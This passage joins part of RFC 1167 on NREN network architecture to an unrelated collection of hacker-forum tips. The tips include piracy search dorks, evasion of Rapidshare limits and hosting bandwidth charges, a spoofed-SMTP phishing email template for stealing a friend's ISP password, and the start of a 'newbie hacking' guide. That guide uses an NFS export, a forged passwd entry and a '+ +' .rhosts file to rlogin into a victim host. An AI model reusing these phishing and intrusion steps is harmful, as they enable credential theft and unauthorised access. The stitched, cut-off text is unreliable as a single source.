Interface (FDDI) nets, Distributed-Queue Dual Bus (DQDB) nets,
Broadband Integrated Services Digital Networks (B-ISDN) utilizing
Asynchronous Transfer Mode (ATM) switching fabrics as well as
conventional Token Ring, Ethernet and other IEEE 802.X technology.
Narrowband ISDN and X.25 packet switching technology network services
are also likely play a role along with Switched Multi-megabit Data
Service (SMDS) provided by telecommunications carriers. It also
would be fair to ask what role FTS-2000 might play in the system, at
least in support of government access to the NREN, and possibly in
support of national agency network facilities.

5. The protocol architecture of the system will continue to exhibit a
layered structure although the layering may vary from the present-day
Internet and planned Open Systems Interconnection structures in some
respects.

6. The system will include servers of varying kinds required to
support the general operation of the system (for example, network
management facilities, name servers of various types, email, database
and other kinds of information servers, multicast routers,
cryptographic certificate servers) and collaboration support tools
including video/teleconferencing systems and other "groupware"
facilities. Accounting and access control mechanisms will be
required.

7. The system will support multiple protocols on an end to end basis.
At the least, full TCP/IP and OSI protocol stacks will be supported.
Dealing with Connectionless and Connection-Oriented Network Services
in the OSI area is an open issue (transport service bridges and

Cerf [Page 2]
RFC 1167 NREN July 1990

application level gateways are two possibilities).

8. Provision must be made for experimental research in networking to
support the continued technical evolution of the system. The NREN
can no more be a static, rigid system than the Internet has been
since its inception. Interconnection of experimental facilities with
the operational NREN must be supported.

9. The architecture must accommodate the use of commercial services,
private and Government-sponsored networks in the NREN system.

Apart from the considerations listed above, it is also helpful to
consider the constituencies and stakeholders who have a role to play
in the use of, provision of and evolution of NREN services. Their
interests will affect the architecture of the NREN and the course of
its creation and evolution.

NREN CONSTITUENTS

The Users

Extrapolating from the present Internet, the users of the system
will be diverse. By legislative intent, it will include colleges
and universities, government research organizations (e.g.,
research laboratories of the Departments of Defense, Energy,
Health and Human Services, National Aeronautics and Space
Administration), non-profit and for-profit research and
development organizations, federally funded research and
development centers (FFRDCs), R&D activities of private
enterprise, library facilities of all kinds, and primary and
secondary schools. The system is not intended to be discipline-
specific.

It is critical to recognize that even in the present Internet, it
has been possible to accommodate a remarkable amalgam of private
enterprise, academic institutions, government and military
facilities. Indeed, the very ability to accept such a diverse
constituency turns on the increasing freedom of the so-called
intermediate-level networks to accept an unrestricted set of
users. The growth in the size and diversity of Internet users, if
it can be said to have been constrained at all, has been limited
in part by usage constraints placed on the federally-sponsored
national agency networks (e.g., NSFNET, NASA Science Internet,
Energy Sciences Net, High Energy Physics Net, the recently
deceased ARPANET, Defense Research Internet, etc.). Given the
purposes of these networks and the fiduciary responsibilities of
the agencies that have created them, such usage constraints seem
highly appropriate. It may be beneficial to search for less

Cerf [Page 3]
RFC 1167 NREN July 1990

constraining architectural paradigms, perhaps through the use of
backbone facilities which are not federally-sponsored.

The Internet does not quite serve the public in the same sense
that the telephone network(s) do (i.e., the Internet is not a
common carrier), although the linkages between the Internet and
public electronic mail systems, private bulletin board systems
such as FIDONET and commercial network services such as UUNET,
ALTERNET and PSI, for example, make the system extremely
accessible to a very wide variety of users.

It will be important to keep in mind that, over time, an
increasing number of institutional users will support local area
networks and will want to gain access to NREN by that means.
Individual use will continue to rely on dial-up access and, as it
is deployed, narrow-band ISDN. Eventually, metropolitan area
networks and broadband ISDN facilities may be used to support
access to NREN. Cellular radio or other mobile communication
technologies may also become increasingly popular as access tools.

The Service Providers

In its earliest stages, the Internet consisted solely of
government-sponsored networks such as the Defense Department's
ARPANET, Packet Radio Networks and Packet Satellite Networks.
With the introduction of Xerox PARC's Ethernet, however, things
began to change and privately owned and operated networks became
an integral part of the Internet architecture.

For a time, there was a mixture of government-sponsored backbone
facilities and private local area networks. With the introduction
of the National Science Foundation NSFNET, however, the
architecture changed again to include intermediate-level networks
consisting of collections of commercially-produced routers and
trunk or access lines which connected local area network
facilities to the government-sponsored backbones. The
government-sponsored supercomputer centers (such as the National
Aerospace Simulator at NASA/AMES, the Magnetic Fusion Energy
Computing Center at Lawrence Livermore Laboratory and the half-
dozen or so NSF-sponsored supercomputer centers) fostered the
growth of communications networks specifically to support
supercomputer access although, over time, these have tended to
look more and more like general-purpose intermediate-level
networks.

Many, but not all, of the intermediate-level networks applied for
and received seed funding from the National Science Foundation.
It was and continues to be NSF's position, however, that such

Cerf [Page 4]
RFC 1167 NREN July 1990

direct subsidies should diminish over time and that the
intermediate networks should become self-sustaining. To
accomplish this objective, the intermediate-level networks have
been turning to an increasingly diverse user constituency (see
section above).

The basic model of government backbones, consortium intermediate
level nets and private local area networks has served reasonably
well during the 1980's but it would appear that newer
telecommunications technologies may suggest another potential
paradigm. As the NSFNET moves towards higher speed backbone
operation in the 45 Mb/s range, the importance of carrier
participation in the enterprise has increased. The provision of
backbone capacity at attractive rates by the inter-exchange
carrier (in this case, MCI Communications Corporation) has been
crucial to the feasibility of deploying such a high speed system.

As the third phase of the NREN effort gets underway, it is
becoming increasingly apparent that the "federally-funded
backbone" model may and perhaps even should or must give way to a
vision of commercially operated, gigabit speed systems to which
the users of the NREN have access. If there is federal subsidy in
the new paradigm, it might come through direct provision of
support for networking at the level of individual research grant
or possibly through a system of institutional vouchers permitting
and perhaps even mandating institution-wide network planning and
provision. This differs from the present model in which the
backbone networks are essentially federally owned and operated or
enjoy significant, direct federal support to the provider of the
service.

The importance of such a shift in service provision philosophy
cannot be over-emphasized. In the long run, it eliminates
unnecessary restrictions on the use and application of the
backbone facilities, opening up possibilities for true ubiquity of
access and use without the need for federal control, except to the
extent that any such services are considered in need of
regulation, perhaps. The same arguments might be made for the
intermediate level systems (metropolitan and regional area access
networks). This does NOT mean that private networks ranging from
local consortia to inter-continental systems will be ruled out.
The economics of private networking may still be favorable for
sufficiently heavy usage. It does suggest, however, that
achieving scale and ubiquity may largely rely on publicly
accessible facilities.

Cerf [Page 5]
RFC 1167 NREN July 1990

The Vendors

Apart from service provision, the technology available to the
users and the service providers will come largely from commercial
sources. A possible exception to this may be the switches used in
the gigabit testbed effort, but ultimately, even this technology
will have to be provided commercially if the system is to achieve
the scale necessary to serve as the backbone of the NREN.

An important consequence of this observation is that the NREN
architecture should be fashioned in such a way that it can be
constructed from technology compatible with carrier plans and
available from commercial telecommunications equipment suppliers.
Examples include the use of SONET (Synchronous Optical Network)
optical transmission technology, Switched Multimegabit Data
Services offerings (metropolitan area networks), Asynchronous
Transmission Mode (ATM) switches, frame relays, high speed,
multi-protocol routers, and so on. It is somewhat unclear what
role the public X.25 networks will play, especially where narrow
and broadband ISDN services are available, but it is also not
obvious that they ought to be written off at this point. Where
there is still research and development activity (such as in
network management), the network R&D community can contribute
through experimental efforts and through participation in
standards-making activities (e.g., ANSI, NIST, IAB/IETF, Open
NMF).

OPERATIONS

It seems clear that the current Internet and the anticipated NREN
will have to function in a highly distributed fashion. Given the
diversity of service providers and the richness of the constituent
networks (as to technology and ownership), there will have to be a
good deal of collaboration and cooperation to make the system work.
One can see the necessity for this, based on the existing voice
network in the U.S. with its local and inter-exchange carrier (IEC)
structure. It should be noted that in the presence of the local and
IEC structure, it has proven possible to support private and virtual
private networking as well. The same needs to be true of the NREN.

A critical element of any commercial service is accounting and
billing. It must be possible to identify users (billable parties,
anyway) and to compute usage charges. This is not to say that the
NREN component networks must necessarily bill on the basis of usage.
It may prove preferable to have fixed access charges which might be
modulated by access data rate, as some of the intermediate-level
networks have found. It would not be surprising to find a mixture of
charging policies in which usage charges are preferable for small

Cerf [Page 6]
RFC 1167 NREN July 1990

amounts of use and flat rate charges are preferred for high volume
use.

It will be critical to establish a forum in which operational matters
can be debated and methods established to allow cooperative operation
of the entire system. A number of possibilities present themselves:
use of the Internet Engineering Task Force as a basis, use of
existing telecommunication carrier organizations, or possibly a
consortium of all service providers (and private network operators?).
Even if such an activity is initiated through federal action, it may
be helpful, in the long run, if it eventually embraces a much wider
community.

Agreements are needed on the technical foundations for network
monitoring and management, for internetwork accounting and exchange
payments, for problem identification, tracking, escalation and
resolution. A framework is needed for the support of users of the
aggregate NREN. This suggests cooperative agreements among network
information centers, user service and support organizations to begin
with. Eventually, the cost of such operations will have to be
incorporated into the general cost of service provision. The federal
role, even if it acts as catalyst in the initial stages, may
ultimately focus on the direct support of the users of the system
which it finds it appropriate to support and subsidize (e.g., the
research and educational users of the NREN).

A voucher system has been proposed, in the case of the NREN, which
would permit users to choose which NREN service provider(s) to
engage. The vouchers might be redeemed by the service providers in
the same sort of way that food stamps are redeemed by supermarkets.
Over time, the cost of the vouchers could change so that an initial
high subsidy from the federal government would diminish until the
utility of the vouchers vanished and decisions would be made to
purchase telecommunications services on a pure cost/benefit basis.

IMPORTANCE OF COMMERCIAL INTERESTS

The initial technical architecture should incorporate commercial
service provision where possible so as to avoid the creation of a
system which is solely reliant on the federal government for its
support and operation. It is anticipated that a hybrid system will
develop but, for example, it is possible that the gigabit backbone
components of the system might be strictly commercial from the start,
even if the lower speed components of the NREN vary from private, to
public to federally subsidized or owned and operated.

Cerf [Page 7]
RFC 1167 NREN July 1990

CONCLUSIONS

The idea of creating a National Research and Education Network has
captured the attention and enthusiasm of an extraordinarily broad
collection of interested parties. I believe this is in part a
consequence of the remarkable range of new services and facilities
which could be provided once the network infrastructure is in place.
If the technology of the NREN is commercially viable, one can readily
imagine that an economic engine of considerable proportions might
result from the widespread accessibility of NREN-like facilities to
business sector.

Security Considerations

Security issues are not discussed in this memo.

Author's Address

Vinton G. Cerf
Corporation for National Research Initiatives
1895 Preston White Drive, Suite 100
Reston, VA 22091

EMail: vcerf@NRI.Reston.VA.US

Phone: (703) 620-8990
------------------------------------------------------------------------------

Unlimited Rapidshare Downloads

Unlimited Rapidshare Downloads

Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:

clean up IE or netscape cookie( In this case the one that belong to rapidshare website)
On Command prompt
type -----> ipconfig /flushdns <---Enter
type -----> ipconfig /release <---Enter
type -----> ipconfig /renew <---Enter
type -----> exit <--------Enter

Or save these commands in a bat file and run it everytime you need to fool Rapidshare server.Remember to clean up rapidshare cookie in your temp Internet files folder.

Now you should be ready to download as many files as you want from their server.

And there is this cool link: paste it in the browser and see
CODE
http://www.google.com/search?lr=&as_qdr=all&q=+.rar+OR+.zip+OR+.pdf+OR+.exe+site%3Arapidshare.de

Ultimate Google Way

Ultimate Google Way

Look for Appz in Parent Directory

intext:"parent directory" intext:"[EXE]"

intext:"parent directory" index of:"[EXE]"

intext:"parent directory" index of:"[RAR]"

This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.

Look for Moviez in Parent Directory

intext:"parent directory" intext:"[VID]"

intext:"parent directory" index of:"[VID]"

This will look for any video filetype in parent directory. You can optionaly add index:"xvid" or intext:"divx" for specific codec movie.

Look for Muzik in Parent Directory

intext:"parent directory" intext:"[MP3]"

intext:"parent directory" index of:"[MP3]"

This will look for any music files.

Look for Gamez in Parent Directory

intext:"parent directory" index of:"[Gamez]"

Speed Up Internet

Speed Up Internet

Windows 2k/XP

1. First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
2. Note the following lines (all hex dwords):
Class = 008 ( biggrin.gif - indicates that TCP/IP is a name service provider, don't change
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS
3. What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:
4. Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 ( biggrin.gif - NetBT name-resolution, including WINS
5. Reboot for changes to take effect

2. Windows 9x/ME

1. The tweak is essentialy the same as in Windows 2000/XP, just the location in the Registry is slightly different. For a more detailed description see the Windows 2000/XP section above
2. Open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider
3. You should see the following settings:
Class=hex:08,00,00,00

LocalPriority=hex:f3,01,00,00
HostsPriority=hex:f4,01,00,00
DnsPriority=hex:d0,07,00,00
NetbtPriority=hex:d1,07,00,00
4. The "priority" lines should be changed to:
LocalPriority=hex:05,00,00,00
HostsPriority=hex:06,00,00,00
DnsPriority=hex:07,00,00,00
NetbtPriority=hex:08,00,00,00
5. Reboot for changes to take effect

3. System.ini IRQ Tweak - Windows 9x/ME ONLY

1. Find your Network Card's IRQ

1. In order to add the entry to your System.ini file, you'd first have to find your NIC's IRQ
2. Right-click on My Computer icon on your Desktop, then left-click on Properties (a shortcut for that would be to press the 'Windows' + 'Pause' keys). Navigate to Device Manager and double-click on Computer. Under "View Resources" you will find a list of IRQs, each with description of the device that's using it. Note the IRQ number used by your Network Adapter

2. Adding the entry to System.ini

1. Once you've found the IRQ of your Network Card, you need to reserve some RAM for its use, by adding an entry to the System.ini file. You can edit the file in any text editor, however the easiest way is to use Windows' built in "System Configuration Editor"
2. Navigate to Start > Run and type sysedit . Find the [386enh] Section in the System.ini file and add Irq[n]=4096 under it, where [n] is the IRQ number of your NIC and 4096 is the amount of RAM you want to reserve in Kbytes. We recommend using 4096, however you can experiment with different values if you want. Save changes in the file, exit and reboot for changes to take effect.
Note: If you choose to try different values, keep in mind that reserving too much RAM for your NIC will decrease the amount of RAM available for applications, while reserving too little might not give the desired effect

3. Additional Thoughts
1. The only negative effect of the System.ini IRQ tweak is that it will reduce the amount of RAM available for running applications a bit, by reserving some specifically for your Network Card's use. The gain in performance usually outweighs the negative effect by far, considering any Computer with 32Mb of RAM or more
2. This tweak may or may not work for you. It is not a documented tweak by Windows
3. Keep in mind that if you add hardware to your system the IRQ of the Network Adapter might change, in which case you will need to modify the setting in System.ini
4. In systems with multiple NICs, you might want to add the setting for both IRQs. Also, you could reserve RAM for other IRQs if you wish, just use common sense and don't forget it reduces the amount of RAM available for running applications
5. If you are using an USB device, it does not have a specific IRQ, however you can try adding the entry using the IRQ of the USB Controller
6. For internal Cable Modems, you'd have to add the entry using the IRQ of your modem, rather than the IRQ of a Network Card

RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

How to Get someones ISP password, Get free internet

How to Get someones ISP password.

1.) run your telnet program:
on windows , go to START -> RUN -> "TELNET".
on linux , you should open a shell , and write telnet.
2.) then connect (on windows "connect" , on linux "open") some anonymous server , if don't have any then search for one , if you are too lame then email me now! i'll give you in the minute! note: you should connect the server mail program (port "25")!
3.) now , write the following :

mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
data
Hi there [YOUR FRIEND'S NAME] , this is [NAME OF YOUR FRIEND'S ISP] support team , lately , our server had some problems with the connection and the user-password files were destroyed , a backup was then released , and it was ok.
but yesterday we found out that it is not an updated version of the file , so , it will start charging you for a larger amount of money for each our you use!
- - - - - - - - - - - - - -
To correct the problem , we have made a speical program to correct the error , all YOU have to do is email :
"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

note: No moeny will be returned if you don't follow our instructions!

thank you,
the support team!

4.) press enter twice and then write "."(without the "") and press ENTER!

--
now , the places you saw ** say that maybe you didn't understood it all , so i'll give you a simple example .

[**YOUR FRIEND'S ISP WEBMASTER**] - example , if your friend is connected througe AOL , then type "webmaster@aol.com" , get it?

[**YOUR FRIEND'S EMAIL ADRESS**] - example , if your friend's email is john@aol.com, then type "john@aol.com".

[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL(American Online) , then type "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard-part , but if you are reading this , then don't worry , you're one step from the end! ..

* launch your WWW browser(MICROSOFT INTERNET EXPLORER\NETSCAPE) , and type "HTTP://www.galaxycorp.com".

* Sign there for an account , now , when they ask you what username you want, then try the closest thing to your ISP name(ex - if your friend is connected thourgh American Online[AOL] then try "aol" or "a_o_l" or "american_online" !)

* and when they ask for your email , type your Real one!!!
now continue in your normal life , and remember to read your email!
if you suddenly get a message from your friend's email adress , and the subject is "john j4o87HnzG" then , guess what , you just saved 10$ a month!

How To Get Top Ranking, Search Engines

The tutorial is all about getting your site listed on top in Search Engines i.e Search Engine Optimization

First thing you need to do is find the keywords you want to optimize for.

There is great tool by Overture (/http://inventory.overture.com/d/sea...ory/suggestion/)

But I would suggest using this free tool called GoodKeywords (/http://www.goodkeywords.com/products/gkw/)

This one does the same job as Overture does but it also supports other Search Engines (Lycos and Teoma etc..)

For example if you want to optimize for the keyword "tech news", just search for the keyword in any of the tools specified above... It would show you keywords related to that and not of the searches..

Pick the keywords which are related to your site.

For example when you search for "Tech News" you'll see the following results:

Count Search Term
11770 tech news
351 itt news tech
191 high tech news
60 news tech texas
49 computer tech news
42 bio news tech
34 in itt news tech
30 news tech virginia
29 asia news tech
25 hi tech news
25 sci tech news

Now see what other terms are related to your keyword technology news

Do couple of searches like that and note down around 15-20 keywords.
Then, keep the keywords which are searched most on the top.

Now you need Title Tag for the page.

Title tag should include top 3 keywords, like for "tech news" it can be like :

"Latest Tech News, Information Technology News and Other computer raleted news here."

Remember that characters should not be more than 95 and should not have more than 3 "," commas - some search engines might cosider more than 3 commas as spam

Now move on to Meta Tags

You need following Meta Tags in web page

No need to have other meta tags like abstract, re-visit and all, most people dont read it.

Now...

This tag is tells content type is html and character set used it iso-8859-1 there are other character sets also but this is the one mosty used..

This one should have all your keywords inside starting from keyword with most counts...

keyword tag for our example would be something like :

Remember to put around 15-20 keywords max not more than that. Dont repeat keywords or dont put keywords like, "tech news", "info tech news", "latest tech news" and so on...

Provide short decription about your site and include all the keywords mentioned in the title tag.

Decription tag should be:

It can be upto 255 characters and avoid using more than 3 "," commas

This is used for search robots..following explanation will help you :

index,follow = index the page as well as follow the links
noindex,follow = dont index the page but follow the links
index,nofollow = index the page but dont follow the links
noindex,nofollow = dont index page, dont follow the links
all = same as index,follow
none = same as noindex,nofollow

Now move on to body part of the page

Include all top 3 keywords here,
I would suggest to break the keyword and use it...

For example

YourSiteName.com one stop for all kind of Latest Tech News and Computer Related information and reviews.................

Include main keywords in tags

etc..
and start with

and then move to

etc..

tag will be too big but CSS can help you there, define small font size in css for H1,H2,... tags

When done with page copy, then you need to provide title and alt tags for images and links.

Use some keywords in the tags but dont add all the keywords and if not neccessary then dont use keywords in it, basically it should explain what is image all about.

Remember to add Top keyword atleast 4 times in the body and other 2 keywords thrice and twice respectively.

Now move on to Footer Part
Try to include top keywords here and see the effect, use site keywords as links i.e.

Tech News Software News etc..

Now finally, you need to read some more stuff..may be you can all it as bottom lines...

Site Map - This is page where you need to put all the links present in your site, this is will help Search Engines to find the links easily and also provide link for site map in footer, as search engines start scanning the page from bottom.

Robots.txt - This file contains address of directories which should not be scanned by search engines.. more info can be found here : /http://www.robotstxt.org/wc/exclusion.html search engines line google, yahoo ask for robots.txt file.

Valid HTML - Your code should have valid html and doc type, Its kind of diffucult to follow all the standards but you can atleast open and close all the tags properly, you can check your page's html online here : /http://validator.w3.org/ or you can use this free software called HTML Tidy : /http://tidy.sourceforge.net/

All done now, you just need to check your site with this script, its called SEO Doctor : /http://www.instantposition.com/seo_doctor.cfm

It'll show you the report of your site with solution.

Now, correct the errors and start submitting the site :

Start with google : /http://google.com/addurl.html
then yahoo : /http://submit.search.yahoo.com/free/request
then move to altavista,alltheweb and other search engies..

Also submit your site to direcories like /http://dmoz.org , /http://jayde.com etc...
Dmoz is must, as google, yahoo and may more search engines uses same directory

And remember, dont try to SPAM with keywords in these directories, dmoz is handled by Human Editors

Submitted the sites, but still i cant see you site on top?

Wait for sometime may be a month or so but keep an eye on your search term, use /http://GoogleAlert.com - this will show whenever google updates for your keywords, it will mail you the new results.

And also check whether your site is listed on google..
use this tool called Google Monitor, it can be downloaded for free from : /http://www.cleverstat.com/google-monitor.htm

How To Block Websties Without Software, block websites

How To Block Websties Without Software, block websites

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--

For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc

Google Tips & Tricks

==================================================
Utilizing search engines
==================================================

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook

Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

Get unlimited bandwidth from your host for free

Get unlimited bandwidth from your host for free

NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP. (IP shared by two or more
websites/domains.) Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didnt require
much space, and didnt want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the acct, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'http://www.123.4.567.890/~user1/ ,
'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As
long as the nameservers dont change, that should have absolutly no
negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and
monitors the traffic that enters their space through the domain its
registered under. Being that the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
restrictions
can't possibly go over bandwidth restrictions = free unlimited
bandwidth

Now the problems with this (besides the ethical ones) is that your
host may offer X amount of mail addys with the acct
(you@y...) and these will not work, as the name isnt on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up/w the ip/UN the host propagated to your
acct. Its at this point where you have to have a phenominal 10-15
character alphanumerical or better (#, &, etc) pw, or your site will
be vulnerable to attack since the attacker already has your UN. This
only gives attackers a slight advantage as the amount of time it
would take to brute force a 10 character pw @ a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and target
them accordingly from your site you have just freed up a signifigant
amount of space. The only setback/w this is having to keep an index
card or file around/w your pws, as you should never use the same one
twice, and want to use complicated ones.

The Newbies-User's Guide to Hacking

User's guide
__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open 80 port. That would
